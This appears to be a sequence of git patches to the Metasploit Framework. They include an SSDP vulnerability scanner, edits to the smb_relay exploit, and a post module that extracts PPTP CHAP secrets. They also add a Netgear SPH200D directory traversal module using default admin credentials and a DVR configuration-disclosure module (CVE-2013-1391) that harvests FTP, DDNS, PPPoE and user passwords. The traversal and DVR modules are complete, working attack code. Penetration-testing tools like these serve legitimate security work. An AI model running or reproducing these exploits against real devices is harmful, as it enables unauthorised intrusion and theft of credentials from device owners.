devices(\/?\s*$|\/1\.([0-5]\..*|8\.0.*|(6\.[0-9]|6\.1[0-7])([\.\,\-\~\s]|$)))/mi + res[:vulns] << { + :name => "Portable SDK for UPnP Devices unique_service_name() Remote Code Execution", + :refs => [ 'CVE-2012-5958', 'CVE-2012-5959' ] + } + end + + if res[:vulns].length > 0 + vrefs = [] + res[:vulns].each do |v| + v[:refs].each do |r| + vrefs << r + end + end + + print_good("#{skey} SSDP #{desc} | vulns:#{res[:vulns].count} (#{vrefs.join(", ")})") + else + print_status("#{skey} SSDP #{desc}") + end + report_service( sinfo ) + res[:vulns].each do |v| + report_vuln( + :host => sinfo[:host], + :port => v[:port] || sinfo[:port], + :proto => v[:proto] || 'udp', + :name => v[:name], + :info => res[:info][:server], + :refs => v[:refs] + ) + end + if res[:info][:ssdp_host] report_service( :host => res[:info][:ssdp_host], From 25ae49154a067e1a457ef2210494a4385dcc9cc6 Mon Sep 17 00:00:00 2001 From: Tod Beardsley <todb@metasploit.com> Date: Tue, 29 Jan 2013 00:55:45 -0600 Subject: [PATCH 190/421] Added author, vprint dressing-up --- modules/auxiliary/scanner/upnp/ssdp_msearch.rb | 9 ++++++++- 1 file changed, 8 insertions(+), 1 deletion(-) diff --git a/modules/auxiliary/scanner/upnp/ssdp_msearch.rb b/modules/auxiliary/scanner/upnp/ssdp_msearch.rb index 23297bf0cdb1..e5111f3176e8 100644 --- a/modules/auxiliary/scanner/upnp/ssdp_msearch.rb +++ b/modules/auxiliary/scanner/upnp/ssdp_msearch.rb @@ -16,7 +16,7 @@ def initialize super( 'Name' => 'UPnP SSDP M-SEARCH Information Discovery', 'Description' => 'Discover information from UPnP-enabled systems', - 'Author' => 'todb', + 'Author' => [ 'todb', 'hdm'], # Original scanenr module and vuln info reporter, respectively 'License' => MSF_LICENSE ) @@ -26,6 +26,10 @@ def initialize ], self.class) end + def rport + datastore['RPORT'] + end + def setup super @msearch_probe = @@ -43,10 +47,13 @@ def scanner_prescan(batch) end def scan_host(ip) + vprint_status "#{ip}:#{rport} - SSDP - sending M-SEARCH probe" scanner_send(@msearch_probe, ip, datastore['RPORT']) end def scanner_postscan(batch) + print_status "No SSDP endpoints found." if @results.empty? + @results.each_pair do |skey,res| sinfo = res[:service] next unless sinfo From f5eaa87c80a51cc43705e7fff37d273049e91c1a Mon Sep 17 00:00:00 2001 From: Tod Beardsley <todb@metasploit.com> Date: Tue, 29 Jan 2013 01:05:18 -0600 Subject: [PATCH 191/421] comment typo --- modules/auxiliary/scanner/upnp/ssdp_msearch.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/auxiliary/scanner/upnp/ssdp_msearch.rb b/modules/auxiliary/scanner/upnp/ssdp_msearch.rb index e5111f3176e8..fba5a396e7c2 100644 --- a/modules/auxiliary/scanner/upnp/ssdp_msearch.rb +++ b/modules/auxiliary/scanner/upnp/ssdp_msearch.rb @@ -16,7 +16,7 @@ def initialize super( 'Name' => 'UPnP SSDP M-SEARCH Information Discovery', 'Description' => 'Discover information from UPnP-enabled systems', - 'Author' => [ 'todb', 'hdm'], # Original scanenr module and vuln info reporter, respectively + 'Author' => [ 'todb', 'hdm'], # Original scanner module and vuln info reporter, respectively 'License' => MSF_LICENSE ) From 929814dabf2997a322bb8f7c50c1c0b2f81765d1 Mon Sep 17 00:00:00 2001 From: Jeff Jarmoc <jeff@jarmoc.com> Date: Tue, 29 Jan 2013 11:04:20 -0600 Subject: [PATCH 192/421] Update modules/exploits/multi/http/rails_json_yaml_code_exec.rb MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit Removes unnecessary include.  Tested on 3.0.19 and 2.3.15. --- modules/exploits/multi/http/rails_json_yaml_code_exec.rb | 1 - 1 file changed, 1 deletion(-) diff --git a/modules/exploits/multi/http/rails_json_yaml_code_exec.rb b/modules/exploits/multi/http/rails_json_yaml_code_exec.rb index efa29002c81e..4066d047fef5 100644 --- a/modules/exploits/multi/http/rails_json_yaml_code_exec.rb +++ b/modules/exploits/multi/http/rails_json_yaml_code_exec.rb @@ -10,7 +10,6 @@ class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking - include Msf::Exploit::CmdStagerTFTP include Msf::Exploit::Remote::HttpClient def initialize(info = {}) From 55600ce2761a9dd0ccd852ea8feddc901bd46e3d Mon Sep 17 00:00:00 2001 From: Jeff Jarmoc <jeff@jarmoc.com> Date: Tue, 29 Jan 2013 11:46:02 -0600 Subject: [PATCH 193/421] Update modules/exploits/multi/http/rails_xml_yaml_code_exec.rb MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit Remove unecessary include.  Tested against rails 3.2.10. --- modules/exploits/multi/http/rails_xml_yaml_code_exec.rb | 1 - 1 file changed, 1 deletion(-) diff --git a/modules/exploits/multi/http/rails_xml_yaml_code_exec.rb b/modules/exploits/multi/http/rails_xml_yaml_code_exec.rb index 0d02e885fdc8..8743f76106cd 100644 --- a/modules/exploits/multi/http/rails_xml_yaml_code_exec.rb +++ b/modules/exploits/multi/http/rails_xml_yaml_code_exec.rb @@ -10,7 +10,6 @@ class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking - include Msf::Exploit::CmdStagerTFTP include Msf::Exploit::Remote::HttpClient def initialize(info = {}) From deb9385181433c5fa1b91bdebbdf5a022614732b Mon Sep 17 00:00:00 2001 From: lmercer <lmercer@mit.edu> Date: Tue, 29 Jan 2013 15:19:35 -0500 Subject: [PATCH 194/421] Patch for smb_relay.rb to allow the share written to, to be defined in an option As described in Redmine Feature #5455 --- modules/exploits/windows/smb/smb_relay.rb | 13 +++++++------ 1 file changed, 7 insertions(+), 6 deletions(-) diff --git a/modules/exploits/windows/smb/smb_relay.rb b/modules/exploits/windows/smb/smb_relay.rb index 0bc45cb8a4f9..c66058140402 100644 --- a/modules/exploits/windows/smb/smb_relay.rb +++ b/modules/exploits/windows/smb/smb_relay.rb @@ -94,7 +94,8 @@ module is not able to clean up after itself. The service and payload register_options( [ - OptAddress.new('SMBHOST', [ false, "The target SMB server (leave empty for originating system)"]) + OptAddress.new('SMBHOST', [ false, "The target SMB server (leave empty for originating system)"]), + OptString.new('SHARE', [ true, "The share to connect to, can be an admin share (ADMIN$,C$,...) or a normal read/write folder share", 'ADMIN$' ]) ], self.class ) end @@ -124,8 +125,8 @@ def smb_haxor(c) return end - print_status("Connecting to the ADMIN$ share...") - rclient.connect("ADMIN$") + print_status("Connecting to the defined share...") + rclient.connect(datastore['SHARE']) @pwned[smb[:rhost]] = true @@ -155,8 +156,8 @@ def smb_haxor(c) print_status("Created \\#{filename}...") - # Disconnect from the ADMIN$ - rclient.disconnect("ADMIN$") + # Disconnect from the SHARE + rclient.disconnect(datastore['SHARE']) print_status("Connecting to the Service Control Manager...") rclient.connect("IPC$") @@ -295,7 +296,7 @@ def smb_haxor(c) rclient.disconnect("IPC$") print_status("Deleting \\#{filename}...") - rclient.connect("ADMIN$") + rclient.connect(datastore['SHARE']) rclient.delete("\\#{filename}") end From 77ea5a40f54137d6722b808b6f8b7f249160cd8f Mon Sep 17 00:00:00 2001 From: sinn3r <msfsinn3r@gmail.com> Date: Tue, 29 Jan 2013 14:19:42 -0600 Subject: [PATCH 195/421] Do report_auth_info --- modules/post/linux/gather/pptpd_chap_secrets.rb | 9 +++++++++ 1 file changed, 9 insertions(+) diff --git a/modules/post/linux/gather/pptpd_chap_secrets.rb b/modules/post/linux/gather/pptpd_chap_secrets.rb index 1972b0cba873..267f95d19e64 100644 --- a/modules/post/linux/gather/pptpd_chap_secrets.rb +++ b/modules/post/linux/gather/pptpd_chap_secrets.rb @@ -81,6 +81,15 @@ def extract_secrets(data) secret = (found[2] || '').strip ip = (found[3] || '').strip + report_auth_info({ + :host => session.sock.peerhost, + :port => 1723, #PPTP port + :sname => 'pptp', + :user => client, + :pass => secret, + :active => true + }) + tbl << [client, server, secret, ip] end From aaf18f0257ba9b8988eb92c0c9624b442fb15c54 Mon Sep 17 00:00:00 2001 From: Tod Beardsley <todb@metasploit.com> Date: Tue, 29 Jan 2013 14:22:19 -0600 Subject: [PATCH 196/421] EOL whitespace, yo. --- modules/exploits/windows/local/payload_inject.rb | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/modules/exploits/windows/local/payload_inject.rb b/modules/exploits/windows/local/payload_inject.rb index 0e748cb6072b..ac2ef8c8456e 100644 --- a/modules/exploits/windows/local/payload_inject.rb +++ b/modules/exploits/windows/local/payload_inject.rb @@ -88,7 +88,7 @@ def has_pid?(pid) pids = [] procs.each do |p| - found_pid = p['pid'] + found_pid = p['pid'] return true if found_pid == pid end @@ -173,4 +173,4 @@ def inject_into_pid(pid) end end -end \ No newline at end of file +end From ea5e993bf3f2e566429e124e34b55f190c71f804 Mon Sep 17 00:00:00 2001 From: m-1-k-3 <michael.messner@integralis.com> Date: Tue, 29 Jan 2013 22:02:29 +0100 Subject: [PATCH 197/421] initial --- .../admin/http/netgear_sph200d_traversal.rb | 134 ++++++++++++++++++ 1 file changed, 134 insertions(+) create mode 100644 modules/auxiliary/admin/http/netgear_sph200d_traversal.rb diff --git a/modules/auxiliary/admin/http/netgear_sph200d_traversal.rb b/modules/auxiliary/admin/http/netgear_sph200d_traversal.rb new file mode 100644 index 000000000000..dde540899607 --- /dev/null +++ b/modules/auxiliary/admin/http/netgear_sph200d_traversal.rb @@ -0,0 +1,134 @@ +## +# $Id: tomcat_utf8_traversal.rb 14975 2012-03-18 01:39:05Z rapid7 $ +## + +## +# This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# web site for more information on licensing and terms of use. +# http://metasploit.com/ +## + +require 'msf/core' + +class Metasploit3 < Msf::Auxiliary + + include Msf::Exploit::Remote::HttpClient + include Msf::Auxiliary::WmapScanServer + include Msf::Auxiliary::Scanner + + def initialize + super( + 'Name' => 'Netgear SPH200D - Directory Traversal Vulnerability', + 'Version' => '$$', + 'Description' => %q{ + This module exploits a directory traversal vulnerablity which is present + in Netgear SPH200D Skype telephone + You may wish to change SENSITIVE_FILES (hosts sensitive files), RPORT depending + on your environment. + }, + 'References' => + [ + [ 'URL', 'http://support.netgear.com/product/SPH200D' ], + [ 'URL', 'http://www.s3cur1ty.de/m1adv2013-002' ], + ], + 'Author' => [ 'm-1-k-3' ], + 'License' => MSF_LICENSE + ) + + register_options( + [ + Opt::RPORT(80), + OptPath.new('SENSITIVE_FILES', [ true, "File containing senstive files, one per line", + File.join(Msf::Config.install_root, "data", "wordlists", "sensitive_files.txt") ]), + OptString.new('USERNAME',[ true, 'User to login with', 'admin']), + OptString.new('PASSWORD',[ true, 'Password to login with', 'password']), + + ], self.class) + end + + def extract_words(wordfile) + return [] unless wordfile && File.readable?(wordfile) + begin + words = File.open(wordfile, "rb") do |f| + f.read + end + rescue + return [] + end + save_array = words.split(/\r?\n/) + return save_array + end + + def find_files(files,user,pass) + traversal = '/../..' + + res = send_request_raw( + { + 'method' => 'GET', + 'uri' => traversal << files, + 'basic_auth' => "#{user}:#{pass}" + }) + if (res and res.code == 200) + print_status("Request may have succeeded on #{rhost}:#{rport}:file->#{files}! Response: \r\n") + print_status("#{res.body}") + elsif (res and res.code) + vprint_error("Attempt returned HTTP error #{res.code} on #{rhost}:#{rport}:file->#{files}") + end + end + + def run_host(ip) + user = datastore['USERNAME'] + if datastore['PASSWORD'].nil? + pass = "" + else + pass = datastore['PASSWORD'] + end + + print_status("Trying to login with #{user} / #{pass}") + + begin + res = send_request_cgi({ + 'uri' => '/', + 'method' => 'GET', + 'basic_auth' => "#{user}:#{pass}" + }) + + unless (res.kind_of? Rex::Proto::Http::Response) + vprint_error("#{target_url} not responding") + end + + return :abort if (res.code == 404) + + if [200, 301, 302].include?(res.code) + print_good("SUCCESSFUL LOGIN. '#{user}' : '#{pass}'") + else + print_error("NO SUCCESSFUL LOGIN POSSIBLE. '#{user}' : '#{pass}'") + return :abort + end + + rescue ::Rex::ConnectionError + vprint_error("Failed to connect to the web server") + return :abort + end + + begin + print_status("Attempting to connect to #{rhost}:#{rport}") + res = send_request_raw( + { + 'method' => 'GET', + 'uri' => '/', + 'basic_auth' => "#{user}:#{pass}" + }) + + if (res) + extract_words(datastore['SENSITIVE_FILES']).each do |files| + find_files(files,user,pass) unless files.empty? + end + end + + rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout + rescue ::Timeout::Error, ::Errno::EPIPE + end + end +end From 8a9dba2ffec1ad8de59f4fba3ad42c2e3d16cf17 Mon Sep 17 00:00:00 2001 From: sinn3r <msfsinn3r@gmail.com> Date: Tue, 29 Jan 2013 16:35:36 -0600 Subject: [PATCH 198/421] Updates host info --- modules/post/linux/gather/pptpd_chap_secrets.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/post/linux/gather/pptpd_chap_secrets.rb b/modules/post/linux/gather/pptpd_chap_secrets.rb index 267f95d19e64..97d7ce6adc18 100644 --- a/modules/post/linux/gather/pptpd_chap_secrets.rb +++ b/modules/post/linux/gather/pptpd_chap_secrets.rb @@ -82,7 +82,7 @@ def extract_secrets(data) ip = (found[3] || '').strip report_auth_info({ - :host => session.sock.peerhost, + :host => datastore['RHOST'], :port => 1723, #PPTP port :sname => 'pptp', :user => client, From b1f8b87f1495ecadd3737fbbe53d22e81e41c4d1 Mon Sep 17 00:00:00 2001 From: Tod Beardsley <todb@metasploit.com> Date: Tue, 29 Jan 2013 17:02:43 -0600 Subject: [PATCH 199/421] Chmod -x the joomla modules. Also fix a title typo joomla_pages was incorrectly titled as "Joomla Version Scanner," which of course is actually joomla_version. --- modules/auxiliary/scanner/http/joomla_pages.rb | 2 +- modules/auxiliary/scanner/http/joomla_plugins.rb | 0 modules/auxiliary/scanner/http/joomla_version.rb | 0 3 files changed, 1 insertion(+), 1 deletion(-) mode change 100755 => 100644 modules/auxiliary/scanner/http/joomla_pages.rb mode change 100755 => 100644 modules/auxiliary/scanner/http/joomla_plugins.rb mode change 100755 => 100644 modules/auxiliary/scanner/http/joomla_version.rb diff --git a/modules/auxiliary/scanner/http/joomla_pages.rb b/modules/auxiliary/scanner/http/joomla_pages.rb old mode 100755 new mode 100644 index 77218063a5af..78b45d33e948 --- a/modules/auxiliary/scanner/http/joomla_pages.rb +++ b/modules/auxiliary/scanner/http/joomla_pages.rb @@ -16,7 +16,7 @@ class Metasploit3 < Msf::Auxiliary # Joomscan and various MSF modules for code examples. def initialize super( - 'Name' => 'Joomla Version Scanner', + 'Name' => 'Joomla Page Scanner', 'Description' => %q{ This module scans a Joomla install for common pages. }, diff --git a/modules/auxiliary/scanner/http/joomla_plugins.rb b/modules/auxiliary/scanner/http/joomla_plugins.rb old mode 100755 new mode 100644 diff --git a/modules/auxiliary/scanner/http/joomla_version.rb b/modules/auxiliary/scanner/http/joomla_version.rb old mode 100755 new mode 100644 From c5ab059a1abf57a388edd6fa3103c6e2fc914b25 Mon Sep 17 00:00:00 2001 From: sinn3r <msfsinn3r@gmail.com> Date: Tue, 29 Jan 2013 18:24:11 -0600 Subject: [PATCH 200/421] Really fix the :host key --- modules/post/linux/gather/pptpd_chap_secrets.rb | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/modules/post/linux/gather/pptpd_chap_secrets.rb b/modules/post/linux/gather/pptpd_chap_secrets.rb index 97d7ce6adc18..e360a816ba59 100644 --- a/modules/post/linux/gather/pptpd_chap_secrets.rb +++ b/modules/post/linux/gather/pptpd_chap_secrets.rb @@ -82,11 +82,12 @@ def extract_secrets(data) ip = (found[3] || '').strip report_auth_info({ - :host => datastore['RHOST'], + :host => session.session_host, :port => 1723, #PPTP port :sname => 'pptp', :user => client, :pass => secret, + :type => 'password', :active => true }) From 668520d8d9458d89e79b00963e88508ac800e7d1 Mon Sep 17 00:00:00 2001 From: jvazquez-r7 <juan.vazquez@metasploit.com> Date: Wed, 30 Jan 2013 17:22:03 +0100 Subject: [PATCH 201/421] added module for cve-2013-1391 --- .../scanner/misc/dvr_config_disclosure.rb | 208 ++++++++++++++++++ 1 file changed, 208 insertions(+) create mode 100644 modules/auxiliary/scanner/misc/dvr_config_disclosure.rb diff --git a/modules/auxiliary/scanner/misc/dvr_config_disclosure.rb b/modules/auxiliary/scanner/misc/dvr_config_disclosure.rb new file mode 100644 index 000000000000..11d31c5c1d84 --- /dev/null +++ b/modules/auxiliary/scanner/misc/dvr_config_disclosure.rb @@ -0,0 +1,208 @@ +## +# This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# web site for more information on licensing and terms of use. +# http://metasploit.com/ +## + + +require 'msf/core' + +class Metasploit3 < Msf::Auxiliary + + include Msf::Exploit::Remote::HttpClient + include Msf::Auxiliary::Report + include Msf::Auxiliary::Scanner + + def initialize + super( + 'Name' => 'Multiple DVR Manufacturers Configuration Disclosure', + 'Description' => %q{ + This module takes advantage of an authentication bypass vulnerability at the + web interface of multiple manufacturers DVR systems, which allows to retrieve the + device configuration. + }, + 'Author' => + [ + 'Alejandro Ramos', # Vulnerability Discovery + 'juan vazquez' # Metasploit module + ], + 'References' => + [ + [ 'CVE', '2013-1391' ], + [ 'URL', 'http://www.securitybydefault.com/2013/01/12000-grabadores-de-video-expuestos-en.html' ] + ], + 'License' => MSF_LICENSE + ) + + end + + def get_ppooe_credentials(conf) + + user = "" + password = "" + + if conf =~ /PPPOE_USER=(.*)/ + user = $1 + end + + if conf =~ /PPPOE_PASSWORD=(.*)/ + password = $1 + end + + if user.empty? or password.empty? + return + end + + info = "PPPOE credentials for #{rhost}, user: #{user}, password: #{password}" + + report_note({ + :host => rhost, + :data => info, + :type => "dvr.pppoe.conf", + :sname => 'pppoe', + :update => :unique_data + }) + + end + + + def get_ddns_credentials(conf) + hostname = "" + user = "" + password = "" + + if conf =~ /DDNS_HOSTNAME=(.*)/ + hostname = $1 + end + + if conf =~ /DDNS_USER=(.*)/ + user = $1 + end + + if conf =~ /DDNS_PASSWORD=(.*)/ + password = $1 + end + + if hostname.empty? + return + end + + info = "DDNS credentials for #{hostname}, user: #{user}, password: #{password}" + + report_note({ + :host => rhost, + :data => info, + :type => "dvr.ddns.conf", + :sname => 'ddns', + :update => :unique_data + }) + + end + + def get_ftp_credentials(conf) + server = "" + user = "" + password = "" + port = "" + + if conf =~ /FTP_SERVER=(.*)/ + server = $1 + end + + if conf =~ /FTP_USER=(.*)/ + user = $1 + end + + if conf =~ /FTP_PASSWORD=(.*)/ + password = $1 + end + + if conf =~ /FTP_PORT=(.*)/ + port = $1 + end + + if server.empty? + return + end + + report_auth_info({ + :host => server, + :port => port, + :sname => 'ftp', + :duplicate_ok => false, + :user => user, + :pass => password + }) + end + + def get_dvr_credentials(conf) + conf.scan(/USER(\d+)_USERNAME/).each { |match| + user = "" + password = "" + active = "" + + user_id = match[0] + + if conf =~ /USER#{user_id}_LOGIN=(.*)/ + active = $1 + end + + if conf =~ /USER#{user_id}_USERNAME=(.*)/ + user = $1 + end + + if conf =~ /USER#{user_id}_PASSWORD=(.*)/ + password = $1 + end + + if active == "0" + user_active = false + else + user_active = true + end + + report_auth_info({ + :host => rhost, + :port => rport, + :sname => 'dvr', + :duplicate_ok => false, + :user => user, + :pass => password, + :active => user_active + }) + } + end + + def run_host(ip) + + res = send_request_cgi({ + 'uri' => '/DVR.cfg', + 'method' => 'GET' + }) + + if not res or res.code != 200 or res.body.empty? or res.body !~ /CAMERA/ + vprint_error("#{rhost}:#{rport} - DVR configuration not found") + return + end + + p = store_loot("dvr.configuration", "text/plain", rhost, res.body, "DVR.cfg") + vprint_good("#{rhost}:#{rport} - DVR configuration stored in #{p}") + + conf = res.body + + get_ftp_credentials(conf) + get_dvr_credentials(conf) + get_ddns_credentials(conf) + get_ppooe_credentials(conf) + + dvr_name = "" + if res.body =~ /DVR_NAME=(.*)/ + dvr_name = $1 + end + + report_service(:host => rhost, :port => rport, :sname => 'dvr', :info => "DVR NAME: #{dvr_name}") + print_good("#{rhost}:#{rport} DVR #{dvr_name} found") + end + +end From cf6aae7bb7593898127236208b0d019ca53647f7 Mon Sep 17 00:00:00 2001 From: jvazquez-r7 <juan.vazquez@metasploit.com> Date: Wed, 30 Jan 2013 17:37:41 +0100 Subject: [PATCH 202/421] add checks for enabled services --- .../scanner/misc/dvr_config_disclosure.rb | 14 ++++++++++++++ 1 file changed, 14 insertions(+) diff --git a/modules/auxiliary/scanner/misc/dvr_config_disclosure.rb b/modules/auxiliary/scanner/misc/dvr_config_disclosure.rb index 11d31c5c1d84..b2e36eaefa5d 100644 --- a/modules/auxiliary/scanner/misc/dvr_config_disclosure.rb +++ b/modules/auxiliary/scanner/misc/dvr_config_disclosure.rb @@ -41,6 +41,13 @@ def get_ppooe_credentials(conf) user = "" password = "" + enabled = "" + + if conf =~ /PPPOE_EN=(\d)/ + enabled = $1 + end + + return if enabled == "0" if conf =~ /PPPOE_USER=(.*)/ user = $1 @@ -71,6 +78,13 @@ def get_ddns_credentials(conf) hostname = "" user = "" password = "" + enabled = "" + + if conf =~ /DDNS_EN=(\d)/ + enabled = $1 + end + + return if enabled == "0" if conf =~ /DDNS_HOSTNAME=(.*)/ hostname = $1 From de544dc3d477752c60bfab71847999b393c57e43 Mon Sep 17 00:00:00 2001 From: sinn3r <msfsinn3r@gmail.com> Date: Wed, 30 Jan 2013 11:25:43 -0600 Subject: [PATCH 203/421] Handle multiple IPs --- modules/post/linux/gather/pptpd_chap_secrets.rb | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/modules/post/linux/gather/pptpd_chap_secrets.rb b/modules/post/linux/gather/pptpd_chap_secrets.rb index e360a816ba59..b351fbbb7217 100644 --- a/modules/post/linux/gather/pptpd_chap_secrets.rb +++ b/modules/post/linux/gather/pptpd_chap_secrets.rb @@ -71,7 +71,7 @@ def extract_secrets(data) # If this line is commented out, ignore it next if l =~ /^[[:blank:]]*#/ - found = l.scan(/(.+)[[:blank:]]+(.+)[[:blank:]]+(.+)[[:blank:]]+(.+)$/).flatten + found = l.split # Nothing is found, skip! next if found.empty? @@ -79,7 +79,7 @@ def extract_secrets(data) client = (found[0] || '').strip server = (found[1] || '').strip secret = (found[2] || '').strip - ip = (found[3] || '').strip + ip = (found[3,found.length] * ", " || '').strip report_auth_info({ :host => session.session_host, From 95cc84f5e860600fff524c1639561cb419dcbfa7 Mon Sep 17 00:00:00 2001 From: sinn3r <msfsinn3r@gmail.com> Date: Wed, 30 Jan 2013 15:42:21 -0600 Subject: [PATCH 204/421] Updates normalize_uri() This function should not remove the trailing slash, because you may end up getting a different HTTP response. The new function also allows multiple URIs as argument, and will just merge & normalize them together. [SeeRM #7733] --- lib/msf/core/exploit/http/client.rb | 19 +++++++------------ 1 file changed, 7 insertions(+), 12 deletions(-) diff --git a/lib/msf/core/exploit/http/client.rb b/lib/msf/core/exploit/http/client.rb index 4d4fd787a602..6d0bd9336b51 100644 --- a/lib/msf/core/exploit/http/client.rb +++ b/lib/msf/core/exploit/http/client.rb @@ -539,23 +539,18 @@ def target_uri # Returns a modified version of the URI that: # 1. Always has a starting slash # 2. Removes all the double slashes - # 3. Removes the trailing slash # - def normalize_uri(str) - # Makes sure there's a starting slash - unless str.to_s[0,1] == "/" - str = "/" + str.to_s - end + def normalize_uri(*strs) + new_str = strs * "/" - # Removes all double slashes - str = str.gsub!("//", "/") while str.index("//") + new_str = new_str.gsub!("//", "/") while new_str.index("//") - # Makes sure there's no trailing slash - unless str.length == 1 - str = str.gsub(/\/+$/, '') + # Makes sure there's a starting slash + unless new_str[0,1] == '/' + new_str = '/' + new_str end - str + new_str end # From d8b15daaf24060c34ca2d8a7973a8e7be35a59f4 Mon Sep 17 00:00:00 2001 From: sinn3r <msfsinn3r@gmail.com> Date: Wed, 30 Jan 2013 16:13:17 -0600 Subject: [PATCH 205/421] Correct rspect to the correct behavior --- spec/lib/msf/core/exploit/http/client_spec.rb | 16 ++++++++-------- 1 file changed, 8 insertions(+), 8 deletions(-) diff --git a/spec/lib/msf/core/exploit/http/client_spec.rb b/spec/lib/msf/core/exploit/http/client_spec.rb index 73298366d42b..d32ce9e12216 100644 --- a/spec/lib/msf/core/exploit/http/client_spec.rb +++ b/spec/lib/msf/core/exploit/http/client_spec.rb @@ -56,8 +56,8 @@ unnormalized_uri[-1, 1].should == '/' end - it "should remove the trailing '/'" do - normalized_uri.should == expected_normalized_uri + it "should end with '/'" do + normalized_uri[-1, 1].should == '/' end context "with just '/'" do @@ -76,11 +76,11 @@ context "with multiple multiple trailing '/'" do let(:unnormalized_uri) do - "#{expected_normalized_uri}//" + "#{expected_normalized_uri}" end - it "should have multiple trailing '/'" do - unnormalized_uri[-2 .. -1].should == '//' + it "should have single trailing '/'" do + unnormalized_uri[-2,1].should == '/' end it "should return only one trailing '/'" do @@ -122,12 +122,12 @@ normalized_uri[0, 1].should == '/' end - it "'should remove trailing '/'" do - normalized_uri[-1, 1].should_not == '/' + it "'should not remove trailing '/'" do + normalized_uri[-1, 1].should == '/' end it 'should normalize the uri' do - normalized_uri.should == expected_normalized_uri + normalized_uri.should == "#{expected_normalized_uri}/" end end From c174e6a2084719c8ec34b38a5d1f90d113b39d66 Mon Sep 17 00:00:00 2001 From: sinn3r <msfsinn3r@gmail.com> Date: Wed, 30 Jan 2013 23:23:41 -0600 Subject: [PATCH 206/421] Correctly use normalize_uri() normalize_uri() should be used when you're joining URIs. Because if you're merging URIs after it's normalized, you could get double slashes again. --- .../auxiliary/admin/http/typo3_sa_2009_001.rb | 4 ++- modules/auxiliary/admin/tikiwiki/tikidblib.rb | 4 +-- modules/auxiliary/dos/http/webrick_regex.rb | 2 +- .../gather/wp_w3_total_cache_hash_extract.rb | 2 +- .../http/bitweaver_overlay_type_traversal.rb | 5 ++-- .../scanner/http/clansphere_traversal.rb | 3 +- .../scanner/http/concrete5_member_list.rb | 4 +-- .../hp_sitescope_getsitescopeconfiguration.rb | 8 ++++-- ...hp_sitescope_loadfilecontent_fileaccess.rb | 8 ++++-- modules/auxiliary/scanner/http/http_put.rb | 6 ++-- .../auxiliary/scanner/http/s40_traversal.rb | 5 ++-- .../http/sap_businessobjects_user_brute.rb | 2 +- .../http/sap_businessobjects_user_enum.rb | 2 +- .../http/sap_businessobjects_version_enum.rb | 2 +- .../http/vmware_update_manager_traversal.rb | 4 +-- .../exploits/linux/http/dolibarr_cmd_exec.rb | 4 +-- .../linux/http/symantec_web_gateway_exec.rb | 4 +-- .../http/symantec_web_gateway_file_upload.rb | 4 +-- modules/exploits/linux/http/vcms_upload.rb | 4 +-- .../linux/http/webcalendar_settings_exec.rb | 7 ++--- .../exploits/linux/http/webid_converter.rb | 10 +++---- .../http/ajaxplorer_checkinstall_exec.rb | 9 +++--- .../multi/http/apprain_upload_exec.rb | 11 ++++---- .../multi/http/auxilium_upload_exec.rb | 11 ++++---- modules/exploits/multi/http/axis2_deployer.rb | 4 +-- .../multi/http/cuteflow_upload_exec.rb | 6 ++-- .../multi/http/horde_href_backdoor.rb | 4 +-- .../http/hp_sitescope_uploadfileshandler.rb | 10 +++---- .../exploits/multi/http/jboss_bshdeployer.rb | 6 ++-- .../http/jboss_deploymentfilerepository.rb | 10 +++---- .../exploits/multi/http/jboss_maindeployer.rb | 8 +++--- .../multi/http/jenkins_script_console.rb | 4 +-- .../multi/http/log1cms_ajax_create_folder.rb | 6 ++-- .../multi/http/mobilecartly_upload_exec.rb | 6 ++-- .../multi/http/movabletype_upgrade_exec.rb | 2 +- .../multi/http/openfire_auth_bypass.rb | 8 +++--- .../multi/http/php_volunteer_upload_exec.rb | 2 +- .../multi/http/phpldapadmin_query_engine.rb | 8 ++---- modules/exploits/multi/http/phptax_exec.rb | 5 ++-- modules/exploits/multi/http/plone_popen2.rb | 8 ++---- .../exploits/multi/http/pmwiki_pagelist.rb | 3 +- .../exploits/multi/http/qdpm_upload_exec.rb | 8 +++--- .../exploits/multi/http/sit_file_upload.rb | 28 +++---------------- .../multi/http/sonicwall_gms_upload.rb | 2 +- .../multi/http/testlink_upload_exec.rb | 14 +++++----- .../exploits/multi/http/tomcat_mgr_deploy.rb | 6 ++-- .../exploits/multi/http/traq_plugin_exec.rb | 9 ++---- .../exploits/multi/http/vbseo_proc_deutf.rb | 8 ++---- .../multi/http/webpagetest_upload_exec.rb | 8 +++--- .../exploits/multi/http/wikka_spam_exec.rb | 12 ++++---- .../exploits/unix/webapp/basilic_diff_exec.rb | 6 ++-- .../unix/webapp/coppermine_piceditor.rb | 4 +-- .../unix/webapp/egallery_upload_exec.rb | 9 +++--- .../unix/webapp/joomla_tinybrowser.rb | 5 ++-- .../exploits/unix/webapp/openx_banner_edit.rb | 22 ++++++--------- .../unix/webapp/oscommerce_filemanager.rb | 4 +-- .../unix/webapp/php_wordpress_foxypress.rb | 9 +++--- .../exploits/unix/webapp/phpbb_highlight.rb | 6 ++-- .../exploits/unix/webapp/phpmyadmin_config.rb | 6 ++-- .../unix/webapp/projectpier_upload_exec.rb | 2 +- .../exploits/unix/webapp/redmine_scm_exec.rb | 2 +- .../unix/webapp/sphpblog_file_upload.rb | 14 +++++----- .../unix/webapp/sugarcrm_unserialize_exec.rb | 3 +- .../webapp/tikiwiki_graph_formula_exec.rb | 5 ++-- .../unix/webapp/tikiwiki_jhot_exec.rb | 8 +++--- .../unix/webapp/tikiwiki_unserialize_exec.rb | 8 +++--- modules/exploits/unix/webapp/twiki_history.rb | 6 ++-- modules/exploits/unix/webapp/twiki_search.rb | 8 +++--- .../http/sonicwall_scrutinizer_sqli.rb | 2 +- .../exploits/windows/http/sybase_easerver.rb | 2 +- 